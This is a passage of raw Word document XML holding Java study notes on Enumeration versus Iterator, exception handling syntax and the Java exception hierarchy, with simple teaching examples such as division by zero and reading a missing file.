          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF29FA" w14:textId="77777777" w:rsidR="0029511D"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there are more elements in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C50271" w14:textId="3E045F77" w:rsidR="00442310"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se when all elements have been iterated through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB952C"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 nextElement()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01355EAC" w14:textId="77777777" w:rsidR="0029511D"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turns the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>next element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C7315" w14:textId="43B7E768" w:rsidR="00442310"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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NoSuchElementException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9D060E" w14:textId="77777777" w:rsidR="0029511D"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move() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Unlik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dated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It was replaced by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roduced in Java 1.2) a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erface has additional functionality like element removal, which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lacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D792E"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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FEB773"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Iterator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438FA187" w14:textId="77777777" w:rsidR="0029511D"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terator Example (modern way):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E156DE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25C8C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93506F"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816E4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00C88"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ArrayList (modern collection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D9179"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2DE2C78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700CF6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C662817"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361CC49C"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F6EBD"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Iterator to iterate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3808E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79B9466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3CEACC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C6C2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62D20DE"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2ED6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E33573" w14:textId="4B26DB5E"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CEC26"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3" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAC50C9"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numeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F5A0F9" w14:textId="77777777" w:rsidR="0029511D"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ode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Enumeration is mostly used when working with older collections such as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6A71515" w14:textId="4BCD1D9B" w:rsidR="00442310"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w Projects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It is recommended to us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or-each loops</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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4" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394D26B"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BBFB5D6"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two main methods: hasMoreElements() and nextElement().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72595A0C"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 replaced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CE4B95"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5" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00DD2727" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BD157D" w14:textId="4AEE1B6D" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B13CFA" w:rsidP="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="209" w:name="_Toc197867423"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exception Handling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="209"/>
    </w:p>
    <w:p w14:paraId="0C325045" w14:textId="77777777" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B" w:rsidP="00127D9B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C399DC1" w14:textId="1FDED1F6" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="210" w:name="_Toc197867424"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="009217B8"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xception </w:t>
      </w:r>
      <w:r w:rsidR="009217B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>andling?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="210"/>
    </w:p>
    <w:p w14:paraId="4345E81E" w14:textId="082D6FBE" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">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Exception Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is a mechanism that allows a program to deal with unexpected situations (known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Key Concepts in Exception Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E1399"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Throwable Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC0F5D"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All exceptions and errors in Java are subclasses of the Throwable class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22464E76"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There are two main types of Throwable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3CB917"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 condition that a program can handle (e.g., file not found, division by zero).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A959858"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Represents serious problems that a program cannot handle (e.g., out of memory, JVM crash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580264E0"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575D801A"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ithmeticException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D621A55"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ception Handling Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFCD11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Java provides a set of keywords for handling exceptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ED034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ry</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines a block of code to be monitored for exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A41BB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catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines a block of code to handle the exception that was thrown by the try block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C89359"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finally</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C905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method signatures to declare that a method may throw one or more exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BAAB4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of Exception Handling in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3448BF4B"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import java.io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF828D" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA0410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public class ExceptionHandlingExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EC63C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07BD34F2"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00A4E55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ight throw an exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FFB74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int result = 10 / 0; // Division by zero (ArithmeticException)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27E1F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Result: " + result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E15D93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73BDEB1"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Reading a file that doesn't exist (FileNotFoundException)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDAE49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leInputStream file = new FileInputStream("nonexistentFile.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F9EA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30F7A42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Handling specific exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27601F8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ArithmeticException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA6C8A7"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Cannot divide by zero!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C682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43E3ECC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FileNotFoundException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FF045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File not found!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755DE4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643D733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ing any other exceptions (Generic catch block)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2479862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Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D68F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An unknown error occurred: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450351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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041205D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nally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4276789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Finally block executed.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FE471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FA740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1422A9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02692BAB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BCEACF"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try block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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finally block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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ypes of Exceptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB6AA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These exceptions are checked during compile time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6167E8A0"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6A543F6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These are runtime exceptions that occur due to programming bugs or logic errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE6831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rayIndexOutOfBoundsException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583FEF55"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do not need to be explicitly handled, though it's generally a good practice to do so.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD71E3"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Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These represent serious issues that typically cannot be handled by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F96DB6C"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OutOfMemoryError, StackOverflowError.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C7C6D"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hrow vs throws:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE324C"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 from a method or block of code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0C5923"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class CustomExceptionExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C4712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6935AC0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B164244"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ustom error");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF918D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atch (IllegalArgumentException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023B1720"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Caught exception: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF2D562"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1F0D145"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5E99052D"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2F6889A2"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the method signature to declare that a method may throw one or more exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874D01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void readFile() throws IOException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1460AE3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ay throw IOException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C08715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4AF0C5A9"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Exception Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DBC0EF"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Catch specific exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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use exceptions for normal flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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leave empty catch blocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Use finally for cleanup</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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7CA88B41" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00000000" w:rsidP="00595923">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="27A66DE9">
          <v:rect id="_x0000_i1596" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4676DA05" w14:textId="77777777" w:rsidR="00333734" w:rsidRPr="00CE4B95" w:rsidRDefault="00333734">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="211" w:name="_Toc197867425"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the hierarchy of Exception?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="211"/>
    </w:p>
    <w:p w14:paraId="52B3F378" w14:textId="3AA8B491" w:rsidR="006C0087" w:rsidRPr="00CE4B95" w:rsidRDefault="006C0087" w:rsidP="009B4E2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is based on a hierarchy of classes, all of which derive from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Throwable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9020C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EB3868">
          <v:rect id="_x0000_i1597" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2046587F"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ception Hierarchy in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BDD0A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lang.Object  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFBAD8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Throwable  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3CF9B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rror  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44F45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xception  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E880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RuntimeException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A95F10D"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FC453">
          <v:rect id="_x0000_i1598" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="154D5E8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Throwable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542F7273"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oot class for all errors and exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B467BB9"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main subclasses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0528CC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FAE39D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFADF24"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7B761F">
          <v:rect id="_x0000_i1599" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4F51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rror</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F68B38"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serious issues that a typical application </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>should not catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7247B683"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stly related to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or system failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4431B142"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169F995"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1998A358"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF351F"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MachineError</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565AB0C"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F7887">
          <v:rect id="_x0000_i1600" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="185FBB76"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xception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA75803"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conditions that an application </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>might want to catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE84321"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 two categories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6264333C"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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390E745E"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checked Exceptions (RuntimeExceptions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A92FF61"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6F90C9">
          <v:rect id="_x0000_i1601" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C2625"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 Checked Exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3047AA"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eck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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D39FFB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must handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them using try-catch or declare with throws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65145A8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58E21D33"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758708C9"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LException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5869105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seException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A597A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NotFoundException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B8A428"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 Unchecked Exceptions (RuntimeException)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E8A58"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ccur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78E1675"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checked at compile time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41003ABB"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ually due to programming mistakes like invalid logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D9E290"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01D584DC"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77569787"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50000B4F"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2CBEAA72"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299D9B9A"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CastException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6721AA"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23C46">
          <v:rect id="_x0000_i1602" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75832B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ee View:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4428EF4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able  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71700A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Error  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72442216"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OutOfMemoryError  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADCA4F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ckOverflowError  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB29FF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B035C1"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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0AF13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IOException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD4F5D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 FileNotFoundException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE7322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SQLException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C238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ParseException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6D2EE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untimeException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ACCA1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NullPointerException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2292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rayIndexOutOfBoundsException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D81919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ithmeticException  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBC02B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llegalArgumentException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0CF7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9F0752">
          <v:rect id="_x0000_i1603" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E3EFDC"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934"/>
        <w:gridCol w:w="2480"/>
        <w:gridCol w:w="3894"/>
      </w:tblGrid>
      <w:tr w:rsidR="009B4E28" w:rsidRPr="00CE4B95" w14:paraId="56158E74" w14:textId="77777777" w:rsidTr="006C0087">
